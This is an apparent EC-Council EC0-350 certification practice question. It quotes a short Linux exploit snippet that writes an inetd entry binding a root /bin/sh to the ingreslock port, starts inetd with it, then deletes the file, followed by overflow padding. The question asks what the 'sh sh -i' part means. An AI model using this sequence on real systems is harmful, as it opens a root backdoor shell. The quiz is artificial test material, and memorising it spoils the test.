ECCouncil EC0-350 Question Answer
Study the following exploit code taken from a Linux machine and answer the questions below:
echo “ingreslock stream tcp nowait root /bin/sh sh –I" > /tmp/x;
/usr/sbin/inetd –s /tmp/x;
sleep 10;
/bin/ rm –f /tmp/x AAAA…AAA
In the above exploit code, the command “/bin/sh sh –I" is given.
What is the purpose, and why is ‘sh’ shown twice?
ECCouncil EC0-350 Summary
- Vendor: ECCouncil
- Product: EC0-350
- Update on: Jul 25, 2025
- Questions: 878